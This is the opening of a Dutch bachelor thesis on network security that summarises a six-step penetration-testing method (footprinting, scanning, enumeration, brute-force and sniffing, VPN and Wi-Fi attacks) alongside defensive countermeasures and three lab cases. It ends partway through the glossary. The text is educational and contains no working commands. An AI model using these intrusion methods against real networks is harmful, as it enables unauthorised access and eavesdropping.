Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan...
164
Hogeschool-Universiteit Brussel Faculteit Bedrijfskunde Studiegebied Bedrijfskunde Bachelor in de toegepaste Informatica Hacking Exposed Bachelorproef aangeboden door Nathan Boone tot het behalen van de graad van Bachelor in de Toegepaste Informatica Academiejaar 2013 – 2014
Transcript of Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan...
Hogeschool-Universiteit Brussel
Faculteit Bedrijfskunde
Studiegebied Bedrijfskunde
Bachelor in de toegepaste Informatica
Hacking Exposed
Bachelorproef aangeboden door
Nathan Boone
tot het behalen van de graad van
Bachelor in de Toegepaste Informatica
Academiejaar 2013 – 2014
Voorwoord Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor
het onderdeel computernetwerken, welbepaald in netwerkbeveiliging. Computernetwerken
interesseert me omdat dit een onderdeel is waarop informatica tegenwoordig gebaseerd is. Zo goed
als iedereen die een computer gebruikt, gebruikt een netwerk. Enerzijds als entertainment: dit gaat
dan van online spelletjes te spelen tot sociale media op de smartphone. Anderzijds op professioneel
vlak: bedrijven die verschillende vestigingen hebben en die met elkaar willen communiceren via een
netwerk. Bij al deze zaken is netwerkbeveiliging een zeer belangrijk aspect, waarvan velen zelfs niet
weten dat dit bestaat.
Aangezien ik zo gefascineerd ben door netwerken heb ik gekozen om hier mijn eindwerk rond te
maken. Ik hoop mijn eindwerk tot een goed einde te brengen, mijn diploma te behalen en zo een
stap dichter komen tot de carrière die ik graag wil uitbouwen in het vak netwerkbeveiliging.
In het tweede semester ga ik naar Salzburg, om daar een stage te doen rond netwerkbeveiliging en
virtualisatie. De kennis die ik opgedaan heb doorheen deze bachelor proef, zal ik zeker ook kunnen
gebruiken tijdens mijn stage. Naast mijn stage zou ik mij ook graag certifiëren bij Cisco.
Mijn dank gaat uit naar de heer Andy Van Maele om mij op het idee te zetten om mijn eindwerk rond
netwerkbeveiliging te doen. Ook zou ik graag dank willen uitbrengen aan de heer Yvan Rooseleer en
de heer Gert Cauwenbergh omdat ze altijd klaarstonden als er vragen waren. De heer Serge Van
Cleynenbreugel zou ik ook graag willen bedanken voor zijn feedback als mentor. Zo wist ik dat ik
goed bezig was.
Inhoudsopgave Voorwoord .............................................................................................................................................. 3
Inleiding ................................................................................................................................................. 13
Hoofdtekst ............................................................................................................................................. 15
1 Stappenplan ................................................................................................................................... 15
1.1 Footprinting ........................................................................................................................... 15
1.1.1 Google ........................................................................................................................... 15
1.1.2 Social Engineering.......................................................................................................... 15
1.2 Scanning ................................................................................................................................ 16
1.2.1 ARP Host Discovery ....................................................................................................... 16
1.2.2 ICMP Host Discovery ..................................................................................................... 16
1.2.3 TCP/UDP Host Discovery ............................................................................................... 16
1.3 Enumeratie ............................................................................................................................ 16
1.4 Hacking Unix .......................................................................................................................... 17
1.4.1 Brute-force .................................................................................................................... 17
1.4.2 Sniffer ............................................................................................................................ 17
1.5 Virtual Private Network ......................................................................................................... 17
1.6 Draadloze Hacking ................................................................................................................. 18
2 Verschillende cases ....................................................................................................................... 18
2.1 Case 1: Scanning en Intrusion Prevention System opstellen ................................................ 18
2.1.1 Scans .............................................................................................................................. 18
2.1.2 Intrusion Prevention System ......................................................................................... 18
2.2 Case 2: Netwerkverkeer afluisteren ...................................................................................... 19
2.2.1 Aanval ............................................................................................................................ 19
2.2.2 Verdediging ................................................................................................................... 19
2.3 Case 3: FTP beheren en hacken ............................................................................................. 19
3 Conclusie ....................................................................................................................................... 19
Lijst met bijlagen ................................................................................................................................... 21
Woordenlijst .......................................................................................................................................... 23
Prince 2TM - Project Initiation Document ............................................................................................... 27
1 Project Definition .......................................................................................................................... 27
2 Background .................................................................................................................................... 27
3 Project objectives .......................................................................................................................... 27
4 Desired outcomes .......................................................................................................................... 28
5 Project scope and exclusions ......................................................................................................... 28
6 Constraints and assumptions ........................................................................................................ 28
7 The user(s) and any other known interested parties .................................................................... 28
8 Interfaces ....................................................................................................................................... 29
9 Project Approach ........................................................................................................................... 29
10 Project Management Team Structure ....................................................................................... 29
11 Role Descriptions ....................................................................................................................... 30
12 Quality Management Strategy .................................................................................................. 30
13 Configuration Management Strategy ........................................................................................ 31
14 Risk Management Strategy ....................................................................................................... 31
15 Communication Management Strategy .................................................................................... 31
16 Project Plan................................................................................................................................ 32
17 Project Controls ......................................................................................................................... 32
Stap 1: Footprinting ............................................................................................................................... 33
1 Inleiding ......................................................................................................................................... 33
2 Openbaar beschikbare informatie ................................................................................................ 33
2.1 Inleiding ................................................................................................................................. 33
2.2 Website ................................................................................................................................. 33
2.2.1 Commentaar .................................................................................................................. 33
2.2.2 Web Application Brute Forcing ..................................................................................... 33
2.3 Google Maps .......................................................................................................................... 34
2.4 Social Engineering ................................................................................................................. 34
2.5 Google Hacking Database (GHDB) ......................................................................................... 34
2.5.1 SiteDigger ...................................................................................................................... 34
2.6 FOCA 3.2 ................................................................................................................................ 35
2.7 Shodanhq ............................................................................................................................... 35
2.8 Forums ................................................................................................................................... 35
2.9 Openbaar beschikbare informatie Tegenmaatregels ........................................................... 35
3 WHOIS and DNS Enumeration ....................................................................................................... 36
3.1 Opzoeken van een IP-adres Tegenmaatregels ...................................................................... 37
3.2 DNS Interrogatie .................................................................................................................... 38
3.2.1 Zone transfers ................................................................................................................ 38
3.2.2 DNS-zone transfer Tegenmaatregels............................................................................. 39
4 Network Reconnaissance .............................................................................................................. 39
4.1 Tracerouting .......................................................................................................................... 39
4.1.1 Hoe werkt traceroute? .................................................................................................. 39
4.2 Network Reconnaissance Tegenmaatregels ......................................................................... 40
4.2.1 NIDS ............................................................................................................................... 40
4.2.2 IPS .................................................................................................................................. 40
4.2.3 Conclusie ....................................................................................................................... 40
5 Conclusie ....................................................................................................................................... 40
Stap 2: Scanning .................................................................................................................................... 43
1 Algemene Inleiding ........................................................................................................................ 43
2 Host Discovery ............................................................................................................................... 43
3 ARP Host Discovery ....................................................................................................................... 43
3.1 MAC-ADRES ........................................................................................................................... 43
3.2 ARP-protocol ......................................................................................................................... 44
3.3 ARP-netwerk scan .................................................................................................................. 45
4 ICMP Host Discovery ..................................................................................................................... 46
4.1 ICMP Host Discovery Tegenmaatregel ................................................................................. 47
4.1.1 Gebruik van een Intrusion Detection System ................................................................ 47
4.1.2 Preventie van ping sweeps ............................................................................................ 47
5 TCP / UDP Host Discovery ............................................................................................................. 48
5.1 Poort scanning ....................................................................................................................... 48
5.1.1 Verschil tussen TCP en UDP ........................................................................................... 48
5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren ........................................ 50
6 Netwerk verkenning tools ............................................................................................................. 51
6.1 Nmap ..................................................................................................................................... 51
6.1.1 ICMP .............................................................................................................................. 51
6.1.2 TCP/UDP poort scanning ............................................................................................... 51
6.2 Hping3 en Nping .................................................................................................................... 55
6.2.1 ICMP scan ...................................................................................................................... 55
6.2.2 TCP/UDP port scanning ................................................................................................. 56
6.3 ScanLine ................................................................................................................................. 57
6.4 netcat ..................................................................................................................................... 57
6.4.1 TCP poortscan ................................................................................................................ 57
6.4.2 UDP poortscan ............................................................................................................... 58
6.5 SuperScan .............................................................................................................................. 58
6.6 Poort scans Tegenmaatregels ............................................................................................... 59
6.6.1 Snort IDS ........................................................................................................................ 59
6.6.2 Treshold logging ............................................................................................................ 59
6.6.3 Onnodige services afzetten ........................................................................................... 59
6.6.4 Voorzichtig te werk gaan met tegenmaatregels ........................................................... 59
7 Raden naar het besturingssysteem ............................................................................................... 60
7.1 Active Stack Fingerprinting .................................................................................................... 60
7.2 Passive Stack Fingerprinting .................................................................................................. 61
7.3 Raden naar het besturingssysteem Tegenmaatregels .......................................................... 61
8 Processing and storing scan data .................................................................................................. 62
Stap 3: Ennumeratie .............................................................................................................................. 63
1 Inleiding ......................................................................................................................................... 63
2 Nmap version scanning ................................................................................................................. 63
2.1 TCP SYN poortscan ................................................................................................................ 64
2.2 TCP versiescan ....................................................................................................................... 64
3 Basic Banner Grabbing .................................................................................................................. 65
3.1 Banner Grabbing met Telnet ................................................................................................. 65
3.2 Banner Grabbing Tegenmaatregels ....................................................................................... 66
4 Enumerating veel voorkomende services ..................................................................................... 66
4.1 FTP Enumeration, TCP 21 ...................................................................................................... 66
4.1.1 FTP anonymous access .................................................................................................. 66
4.1.2 FTP Tegenmaatregels .................................................................................................... 67
4.2 Telnet Enumeratie, TCP 23 .................................................................................................... 67
4.2.1 System Enumeratie via Telnet Banners ......................................................................... 67
4.2.2 User Enumeratie via Telnet ........................................................................................... 68
4.2.3 Telnet Enumeratie Tegenmaatregels ............................................................................ 68
4.3 TFTP Enumeratie, TCP/UDP 69 .............................................................................................. 68
4.3.1 Bestanden kopiëren met een Linux TFTP Server ........................................................... 68
4.3.2 Accessing Router/Switch Configurations via TFTP ........................................................ 68
4.3.3 TFTP Enumeratie Tegenmaatregels ............................................................................... 69
4.4 IPSec/IKE, UDP 500 ................................................................................................................ 69
4.4.1 Probing IPSec tunnel ...................................................................................................... 69
4.4.2 IPSec/IKE Enumeratie Tegenmaatregels ....................................................................... 69
Stap 4: Hacking Unix .............................................................................................................................. 71
1 Inleiding ......................................................................................................................................... 71
2 Brute-force Aanval......................................................................................................................... 71
2.1 Brute-force aanval toepassen ............................................................................................... 71
2.2 Brute-Force aanval Tegenmaatregels ................................................................................... 72
3 File Transfer Protocol .................................................................................................................... 73
3.1 FTP-server aanvallen ............................................................................................................. 73
3.2 FTP aanval Tegenmaatregels ................................................................................................ 73
4 Secure Shell ................................................................................................................................... 74
4.1 SSH ......................................................................................................................................... 74
4.2 SSH Tegenmaatregels ........................................................................................................... 74
5 Sniffers ........................................................................................................................................... 74
5.1 Wat is een sniffer? ................................................................................................................. 74
5.2 Aanvaller ................................................................................................................................ 74
5.3 Administrator ........................................................................................................................ 74
5.4 Hoe werkt een sniffer? .......................................................................................................... 74
5.5 Voorbeeld van een sniffer ..................................................................................................... 74
5.6 Populaire sniffers ................................................................................................................... 76
5.7 Sniffers Tegenmaatregel....................................................................................................... 76
5.7.1 Migreren naar een switched netwerk topologie ........................................................... 76
5.7.2 Sniffers detecteren ........................................................................................................ 76
5.7.3 Encryptie (SSH, IPSec) .................................................................................................... 76
6 Honeypot server ............................................................................................................................ 77
Stap 5: Virtual Private Network ............................................................................................................. 79
1 Inleiding ......................................................................................................................................... 79
2 Virtual Private Network (VPN) ....................................................................................................... 79
2.1 De tot stand komst van een IPSec VPN ................................................................................. 80
2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) .................................................................... 80
2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) .................................................................... 81
2.2 Site-to-site VPN ..................................................................................................................... 82
2.3 Client-to-site VPN .................................................................................................................. 82
2.4 Google hacking voor VPN ...................................................................................................... 82
2.4.1 Google hacking voor VPN Tegenmaatregel ................................................................... 83
2.5 Probing IPSec VPN Servers .................................................................................................... 83
2.5.1 Probing IPSec VPN Servers Tegenmaatregel ................................................................. 83
2.6 Attacking IKE Aggressive Mode ............................................................................................. 84
2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel .......................................................... 84
Stap 6: Wireless Hacking ....................................................................................................................... 85
1 Inleiding ......................................................................................................................................... 85
2 Achtergrond ................................................................................................................................... 85
3 Channels en frequenties ................................................................................................................ 85
4 Verschillende types Wi-Fi .............................................................................................................. 86
4.1 Ad-hoc ................................................................................................................................... 86
4.2 Infrastructure ........................................................................................................................ 86
5 Manieren om een draadloos netwerk te beveiligen ..................................................................... 87
5.1 Basis methodes ...................................................................................................................... 87
5.1.1 MAC filtering .................................................................................................................. 87
5.1.2 Verborgen draadloze netwerken .................................................................................. 87
5.1.3 Antwoorden op probe requests .................................................................................... 87
5.2 Authenticatie ......................................................................................................................... 88
5.2.1 WPA four-way handshake ............................................................................................. 88
5.3 Encryptie ................................................................................................................................ 89
6 Discovery en monitoren ................................................................................................................ 90
6.1 Active Discovery .................................................................................................................... 90
6.2 Active Discovery Tegenmaatregels ....................................................................................... 90
6.3 Passive Discovery................................................................................................................... 90
6.4 Passive Discovery Tegenmaatregels ...................................................................................... 90
6.5 Discovery tools ...................................................................................................................... 90
6.5.1 Kismet ............................................................................................................................ 91
6.5.2 Airodump-ng .................................................................................................................. 91
7 Denial of service attack ................................................................................................................. 92
7.1 De-authenticatie aanval ........................................................................................................ 92
7.1.1 airplay-ng ....................................................................................................................... 92
8 Encryptie aanval ............................................................................................................................ 93
8.1 WEP ....................................................................................................................................... 93
8.1.1 Achtergrond bij WEP encryptie ..................................................................................... 93
8.1.2 Passieve aanval .............................................................................................................. 93
8.2 ARP Replay with Fake authenticaton .................................................................................... 94
8.2.1 Aanval met de aircrack-ng suite .................................................................................... 95
8.2.2 WEP Hacking Tegenmaatregels ..................................................................................... 96
Case 1: Scannen en IPS instellen ........................................................................................................... 97
1 Inleiding ......................................................................................................................................... 97
2 Topologie Diagram ........................................................................................................................ 97
3 IP-adressen tabel ........................................................................................................................... 97
4 Objectieven ................................................................................................................................... 97
5 Stappenplan ................................................................................................................................... 98
5.1 Stap 1: Testnetwerk opstellen en uittesten .......................................................................... 98
5.1.1 IP-adressen instellen ..................................................................................................... 98
5.1.2 OSPF instellen ................................................................................................................ 98
5.1.3 Testnetwerk uittesten ................................................................................................... 99
5.2 Stap 2: Netwerk scannen ....................................................................................................... 99
5.2.1 ARP-scan ........................................................................................................................ 99
5.2.2 Ping-sweep .................................................................................................................. 100
5.2.3 TCP poortscan .............................................................................................................. 100
5.2.4 Intense scan ................................................................................................................. 101
5.3 Stap 3: Intrusion Prevention System ................................................................................... 102
5.3.1 Intrusion Prevention System instellen ........................................................................ 102
6 Conclusie ..................................................................................................................................... 112
Case 2: Netwerkverkeer afluisteren .................................................................................................... 113
1 Inleiding ....................................................................................................................................... 113
2 Topologie Diagram ...................................................................................................................... 113
3 IP Adressen Tabel ........................................................................................................................ 114
4 Objectieven ................................................................................................................................. 114
5 Stappenplan ................................................................................................................................. 114
5.1 Stap 1: Testnetwerk opstellen en uittesten ........................................................................ 114
5.1.1 IP-adressen en een default-route instellen op de HoofdRouter ................................. 115
5.1.2 DHCP server configureren ........................................................................................... 115
5.1.3 Testnetwerk uittesten ................................................................................................. 116
5.2 Stap 2: Netwerk scannen ..................................................................................................... 117
5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren ........................................ 118
5.3.1 ARP Poisoning .............................................................................................................. 118
5.3.2 ARP Poisoning met Ettercap ........................................................................................ 119
5.4 Stap 4: MAC table flooding .................................................................................................. 121
6 Tegenmaatregel tegen afluisteren van het netwerk ................................................................... 122
6.1 Switchport port security ...................................................................................................... 122
6.2 Dynamic ARP-inspection ..................................................................................................... 122
6.3 SSH in plaats van Telnet ...................................................................................................... 123
7 Conclusie ..................................................................................................................................... 123
Case 3: FTP beheren en aanvallen ....................................................................................................... 125
1 Inleiding ....................................................................................................................................... 125
2 Benodigdheden ........................................................................................................................... 125
2.1 FTP server ............................................................................................................................ 125
2.2 FTP client ............................................................................................................................. 125
3 Objectieven ................................................................................................................................. 125
4 Stappenplan ................................................................................................................................. 126
1. FTP server installeren en configureren ................................................................................... 126
2. FTP server configureren voor anonieme toegang ................................................................... 127
3. Logging inschakelen ................................................................................................................. 129
4. Server proberen kraken ........................................................................................................... 131
5. Conclusies trekken ................................................................................................................... 131
6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken ............... 131
7. Server proberen kraken ........................................................................................................... 133
5 Conclusie ..................................................................................................................................... 136
Bibliografie .......................................................................................................................................... 137
1 Websites ...................................................................................................................................... 137
2 Boeken ......................................................................................................................................... 137
Timesheets .......................................................................................................................................... 138
1 Tijdstabel Hacking Exposed ......................................................................................................... 138
2 Tijdstabel Netwerk Security ........................................................................................................ 143
Curriculum Vitae Nathan Boone.......................................................................................................... 150
......................................................................................................................................................... 150
De presentatie ..................................................................................................................................... 153
13
Inleiding De meeste netwerkgebruikers zijn tevreden als ze het internet kunnen gebruiken voor allerhande
doeleinden. Ze zijn niet bewust van de gevaren dat dit met zich meebrengt.
Het project dat ik gerealiseerd heb, is een stappenplan dat een netwerk beheerder kan gebruiken om
na te gaan of zijn netwerk veilig is. Dit zijn natuurlijk ook stappen die een hacker kan gebruiken om
binnen te breken in een netwerk.
Deze stappen omvatten enerzijds aanvallen die kunnen uitgevoerd worden door de hacker en
anderzijds, tegenmaatregelen die gebruikt kunnen worden door de netwerkbeheerder.
Als basis voor dit eindwerk heb ik de methodiek gebruikt zoals beschreven staat in het boek Hacking
Exposed 7. Dit boek is geschreven door Stuart McClure, Joel Scambray en George Kurtz. Als keuzevak
heb ik het vak CCNA Security gevolgd, gedoceerd door Yvan Rooseleer. Dit heeft me nog een andere
kijk gegeven op netwerkbeveiliging en hoe dit in een netwerk kan geïmplementeerd worden en wat
de “best practices” zijn.
Om vele aanvallen die besproken staan in dit document uit te voeren heb ik Backtrack 5 r3
geïnstalleerd. Dit is een besturingssysteem dat speciaal ontworpen is om aan “penetration testing” te
doen. Dit is de vorm van hacking die besproken zal worden.
In de hoofdtekst zullen de verschillende stappen in de methodiek kort en bondig besproken worden.
De tegenmaatregels en meer informatie over de stappen zijn terug te vinden in de bijlagen.
In dit document gaat het zowel over aanvallen als tegenmaatregels. De tegenmaatregels heb
ik gekenmerkt door er een verbodsteken voor te plaatsen.
Er zijn vrij veel commando’s gebruikt in deze tekst. Om een duidelijk onderscheid te brengen tussen
de tekst en de commando’s heb ik de deze stijl gebruikt om de commando’s te kenmerken.
14
15
Hoofdtekst De hoofdtekst bestaat uit twee delen, een stappenplan en een overzicht van de verschillende cases.
1 Stappenplan Dit is een stappenplan van 6 stappen volgens de methodiek besproken in het boek “Hacking Exposed
7. In dit stappenplan zullen de stappen één voor één uitgelegd worden. Een gedetailleerdere uitleg
en gedane testen zijn terug te vinden in de bijlagen.
1.1 Footprinting Je kan niet zomaar ergens binnenbreken en het netwerk beginnen te hacken, want dit zou tot weinig
succes leiden. Deze eerste stap is het in kaart brengen van de onderneming of de persoon bij wie je
wil inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren voor je
zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Bij hacking
is het belangrijk dat je zo weinig mogelijk sporen achterlaat. Dit is de moeilijkste taak van de hacker.
Iedereen kan hacken, maar de persoon die geen sporen achterlaat is de beste hacker.
Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het
belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal
plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij
wil plegen.
1.1.1 Google Google is een zoekmachine die veel gebruikt wordt bij Footprinting. Je kan er allerhande zoektermen
ingeven om zo naar personen, bedrijven en zelfs configuraties van toestellen te zoeken. Deze
speciale zoektermen zijn te vinden in de “Google Hacking Database” (GHDB).
Door te zoeken naar een eventueel probleem bij het instellen van een netwerk, kan je zo aan geldige
IP-adressen komen. Vele netwerkbeheerders die een vraag hebben, stellen deze vraag op een forum
zonder de gevoelige gegevens hiervan te wissen.
Google is ook gekend voor zijn “Google Maps” applicatie, welbepaald “Streetview”. Hiermee kan je
zoeken naar bedrijven en kan je virtueel zelfs rondlopen op een bedrijventerrein. Dit zou je kunnen
doen om te identificeren waar je ongemerkt van in je auto het draadloos netwerk kan infiltreren. Het
is belangrijk als bedrijf dat je ervoor zorgt dat het draadloos netwerk niet buiten de bedrijfsmuren
gaat. Je kan dit doen door de sterkte van het signaal aan te passen.
1.1.2 Social Engineering Social Engineering is een methode die zeer veel gebruikt wordt om aan Footprinting te doen. Zo goed
als iedereen of elk bedrijf heeft wel ergens een profiel op sociale media. Dit kan gaan van een
professionele pagina op LinkedIn tot een pagina op Facebook waar private informatie op te vinden is.
Op deze manier is het gemakkelijk opzoekingswerk te verrichten over de persoon of het bedrijf in
kwestie zonder dat zij hier iets van te weten komen.
16
1.2 Scanning In stap Footprinting ging het over het in kaart brengen van een bedrijf en hoe je verschillende
gevoelige gegevens kan te weten komen. In deze stap gaan we hierin verder, hier zullen we
verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in kaart te brengen. We
zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en welke apparaten met
welke services in het netwerk actief zijn.
Op een netwerk zijn verschillende manieren van “Host Discovery” mogelijk.
1.2.1 ARP Host Discovery Bij ARP Host Discovery zal je gebruik maken van het ARP-protocol om aan Host Discovery te doen. Je
kan aan een range van IP-adressen ARP-Requests sturen. Door het ARP-protocol zullen de hosts met
de bepaalde IP-adressen antwoorden met een ARP-Reply. Als je een ARP-Reply terugkrijgt, weet je
dus dat die host aanwezig is op het netwerk.
1.2.2 ICMP Host Discovery Bij ICMP Host Discovery zal je naar de verschillende IP-adressen ICMP Echo Requests sturen. Van de
toestellen waarvan je een ICMP Echo Reply terugkrijgt, weet je dat ze aanwezig zijn op het netwerk.
1.2.3 TCP/UDP Host Discovery Elk toestel heeft TCP of UDP netwerk poorten. Achter deze poorten bevinden zich services, één van
deze services is bijvoorbeeld het mogelijk maken naar een website te gaan. Als je naar een website
gaat, zal je surfen naar poort 80 omdat poort 80 HTTP is.
Bij TCP/UDP Host Discovery zal je op verschillende manieren een connectie proberen op te bouwen
met verschillende poorten. Van de poorten die de connectie aanvaarden, weet je dat de
achterliggende service aan staat.
1.3 Enumeratie In stap twee Scanning zijn we op zoek gegaan naar welke services op welke toestellen aanwezig zijn
in een netwerk. In deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot
het identificeren van de service en het besturingssysteem. We kunnen hierbij ook te weten komen
welke versie hiervan geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen
naar de systemen. Deze connecties zullen waarschijnlijk gelogd worden door het systeem dat je wil
aanvallen. Hierdoor bestaat er een mogelijkheid dat je uitgesloten wordt van het netwerk.
Veel van de informatie die je via enumeratie buitmaakt, lijkt op het eerste zicht ongevaarlijk. Maar
vooraleer je kan binnenbreken in een systeem zal je eerst de service, poort en versie moeten
identificeren. Eens deze geïdentificeerd zijn kan je op zoek gaan naar gekende kwetsbaarheden.
De services die verder uitgelegd worden in de bijlage over Enumeratie zijn:
FTP: TCP poort 21
Telnet: TCP poort 23
TFTP: TCP/UDP poort 69
IPSec/IKE: UDP poort 500
17
1.4 Hacking Unix In de vorige stappen was het doel om het netwerk in kaart te brengen en informatie te krijgen over
de verschillende aanwezige systemen, protocollen en waar deze aanwezig zijn in het netwerk. In
deze stap zullen we proberen binnen te breken in de specifieke services. Het doel van deze stap is
toegang krijgen tot de systemen en waar het kan “root access” proberen te verkrijgen op de
systemen.
Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste
servers bestaan uit Unix-servers hebben we beslist om enkel “Hacking Unix” te bespreken.
1.4.1 Brute-force Om in de services binnen te breken, kan je gebruik maken van een brute-force aanval. Deze aanval
zal op een korte tijd zeer veel wachtwoorden en gebruikersnamen uitproberen naar de verschillende
services. Wat je meestal doet bij een brute-force aanval, zijn de gebruikersnamen en gegevens over
het bedrijf dat je verworven hebt bij Footprinting in bestanden steken. Je kan deze bestanden dan
gebruiken als mogelijke wachtwoorden en gebruikersnamen bij de brute-force aanval. De meest
gebruikte wachtwoorden zijn, je woonplaats, een simpele cijfercombinatie of je eigen naam.
1.4.2 Sniffer Als je een service zoals Telnet gebruikt, waarbij al de ingetypte tekst in gewoon, niet-geëncrypteerd
formaat over het netwerk verstuurd wordt kan je door het netwerkverkeer af te luisteren aan
wachtwoorden en gebruikersnamen komen. Hierdoor kan je je inloggen in de bepaalde services.
Een Sniffer is een programma dat het mogelijk maakt om al het netwerkverkeer dat voorbijkomt af te
luisteren en te analyseren. Je kan ook een filter plaatsen zodat je enkel de pakketten ziet die je
interesseren.
1.5 Virtual Private Network Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de
systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij
de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private
Network (VPN).
Als je bij een Virtual Private Network kan binnenbreken, dan heb je toegang tot het interne netwerk
van dat bedrijf en wordt je aanzien als een vertrouwde gebruiker.
Een VPN heeft vier grote voordelen:
Confidentialiteit
Data integriteit
Authenticatie
Antireplay
18
1.6 Draadloze Hacking In een bedrijfsomgeving wordt een draadloos netwerk steeds meer gebruikt, omdat het gemakkelijk
is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten, in vele
bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun eigen
toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze oplossing
voor het netwerk.
Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je
draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs geen sociale
controle meer of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van buiten
je gebouw proberen toegang te krijgen tot je draadloos netwerk.
Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze
manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.
2 Verschillende cases We hebben drie cases opgesteld en uitgevoerd om zo onze kennis op het vlak van netwerkbeveiliging
te testen.
We hebben een case opgesteld over scanning en hoe je ervoor kan zorgen dat je netwerk niet
gescand kan worden.
De tweede case gaat over het afluisteren van netwerkverkeer om zo aan wachtwoorden en
gebruikersnamen te geraken.
De laatste case gaat over FTP, we hebben een FTP server opgesteld en dan in deze FTP server
binnengebroken. In deze case gaat het ook over de tegenmaatregels die je kan nemen.
2.1 Case 1: Scanning en Intrusion Prevention System opstellen In case één wordt besproken hoe je scans kan uitvoeren op een netwerk en hoe je je hiertegen kan
beschermen.
2.1.1 Scans De scans die uitgevoerd worden zijn:
ARP-scan
ICMP-scan
TCP/UDP poortscan
2.1.2 Intrusion Prevention System Met een Intrusion Prevention System (IPS) kan je beperken welk verkeer je netwerk toelaat. Omdat
deze inline staat, kan een IPS, verkeer dat niet toegelaten is in het netwerk, niet doorlaten. Hierdoor
bereikt dit verkeer zijn eindbestemming niet.
Je kan met een IPS controleren op zowel de eigenschappen van de pakketten als ook op virussen of
andere kwaadaardige zaken die aanwezig kunnen zijn in een netwerk.
19
2.2 Case 2: Netwerkverkeer afluisteren In case twee wordt besproken hoe je het verkeer in een netwerk kan omleiden via je computer
zonder dat er iemand hier iets van merkt. Hierdoor kan je het netwerkverkeer afluisteren en zo
wachtwoorden, gebruikersnamen en gevoelige informatie over het bedrijf of persoon te weten
komen.
2.2.1 Aanval Om het netwerkverkeer af te luisteren, zijn er twee verschillende aanvallen die dit kunnen doen.
Deze twee aanvallen zijn:
ARP poisoning
MAC flooding
2.2.2 Verdediging Je kan je tegen beide van deze aanvallen verdedigen. Je zal dan verdedigingsmechanismen gebruiken
die je kan instellen in de switch en in de router.
Dynamic ARP inspection
Switchport security
2.3 Case 3: FTP beheren en hacken FTP (File Transfer Protocol)-servers worden in bedrijven vaak gebruikt om bestanden te delen, die
tevens extern kunnen geraadpleegd worden. De taak van een netwerkbeheerder is om de FTP-server
toegankelijk te maken voor werknemers, en tegelijk de veiligheid te bewaren zodat onbevoegde
personen de server niet kunnen binnendringen.
De manier waarop dit gedaan wordt is door bepaalde configuraties te maken waarmee we accounts
verkrijgen, die daarna door bepaalde gebruikers kunnen gebruikt worden en deze te beveiligen met
een wachtwoord.
Vooraleer je een aanval uitvoert, moet je eerst weten achter welk IP-adres zich een FTP-server
bevindt. Je zal dit te weten komen door een TCP/UDP poortscan uit te voeren. Eens je het IP-adres
weet, kan je proberen via anonieme toegang op de FTP server te geraken.
Als anonieme toegang niet werkt, kan je nog altijd een brute-force aanval proberen uit te voeren.
Hierbij zal je vele wachtwoorden en gebruikersnamen uitproberen in een korte tijd. Deze
gebruikersnamen en wachtwoorden zijn diegene die je gevonden hebt tijdens dat je Footprinting aan
het toepassen was.
3 Conclusie Door aan deze bachelor proef te werken heb ik zeer veel kennis opgedaan over netwerkbeveiliging.
Deze kennis zal ik op mijn stage in Salzburg en verder in mijn toekomstige carrière zeker kunnen
gebruiken. Dit was een zeer interessant eindwerk om aan te werken.
Ik hoop dat dit ook een interessante leidraad is voor een netwerkbeheerder of een andere gebruiker.
20
21
Lijst met bijlagen
Woordenlijst .......................................................................................................................................... 23
Prince 2TM - Project Initiation Document ............................................................................................... 27
Stap 1: Footprinting ............................................................................................................................... 33
Stap 2: Scanning .................................................................................................................................... 43
Stap 3: Ennumeratie .............................................................................................................................. 63
Stap 4: Hacking Unix .............................................................................................................................. 71
Stap 5: Virtual Private Network ............................................................................................................. 79
Stap 6: Wireless Hacking ....................................................................................................................... 85
Case 1: Scannen en IPS instellen ........................................................................................................... 97
Case 2: Netwerkverkeer afluisteren .................................................................................................... 113
Case 3: FTP beheren en aanvallen ....................................................................................................... 125
Bibliografie .......................................................................................................................................... 137
Timesheets .......................................................................................................................................... 138
Curriculum Vitae Nathan Boone.......................................................................................................... 150
De presentatie ..................................................................................................................................... 153
22
23
Woordenlijst Access point: als je connectie maakt met het draadloos netwerk zal je verbinding maken met een
accespoint. Deze acces point zal dan verbonden zijn met het bedraad netwerk.
Accounting: bij accounting wordt alles wat je op het systeem uitvoert, bijgehouden.
Administrator privileges: als je administrator privileges hebt, heb je vele rechten en kan je zo goed als
alles doen op het betreffende toestel. Dit houdt in, programma’s instaleren, wijzigen en verwijderen.
Advanced pakket filtering: advanced pakket filtering is een techniek dat gebruikt wordt door een
